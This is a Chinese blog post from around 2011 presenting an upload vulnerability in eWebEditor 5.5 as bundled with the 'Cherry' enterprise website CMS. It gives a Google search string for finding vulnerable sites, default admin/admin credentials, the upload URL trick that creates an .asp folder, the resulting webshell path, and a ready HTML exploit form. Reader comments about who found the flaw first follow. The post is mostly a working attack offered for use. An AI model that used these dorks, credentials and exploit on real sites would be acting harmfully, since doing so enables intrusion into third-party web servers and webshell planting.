By:黑皮

    虽说这款是“樱桃企业网站管理系统”,但是被很多人改来改去,这个EW 5.5解析漏洞使用没有修复。

软件介绍:

    樱桃企业网站管理系统全DIV+CSS模板,多浏览器适应,完美兼容IE6-IE8,火狐,谷歌等符合标准的浏览器,模板样式集中在一个CSS样式中,内容与样式完全分离,方便网站设计人员开发模板与管理。系统较为安全,以设计防注入,敏感字符屏蔽。新闻,产品,单页独立关键字设计,提高搜索引擎收录。

  内置IIS测试,双击打启动预览网站。

下载地址:

    http://down.chinaz.com/soft/29447.htm

GOOGLE查询:

    inurl:Products.asp?main_id=

    基本上都后台密码都是默认的:admin admin。

漏洞分析:

    ewebeditor v5.5 漏洞,建立 *.asp 文件夹,上传 *.jpg 木马。

漏洞地址:

    http://127.0.0.1/admin/eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=xx.asp

图片木马地址:

    http://127.0.0.1/uploadfile/xx.asp/*.jpg
    (有些是找不到的查看源代码也是不行的,只有抓包)

    上传后查看源代码找到地址。

    EXP 代码,保存为 *.html。

Exp:

<form action="http://127.0.0.1/admin/eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=xx.asp" method=post name=myform enctype="multipart/form-data"> 
<input type=file name=uploadfile size=100><br><br> 
<input type=submit value=upload> 
</form>

Ps:

    1、后台还有 EW 5.5 远程文件上传。
    2、EW 后台路径:/admin/eWebEditor/admin/login.asp,账号密码:admin admin。

留言评论(旧系统):

Mr.DzY @ 2011-04-15 14:47:34

难不成这个漏洞是我们同时发现的?黑皮? 闷!

本站回复:

不晓得,我照搬的……

Mr.DzY @ 2011-04-15 14:49:51

http://www.0855.tv/post/YingTaoQiYeWangZhanGuanLiXiTong-v1-0-ShangChuanLouDong.htm

本站回复:

看日期,你比他发现得早一天。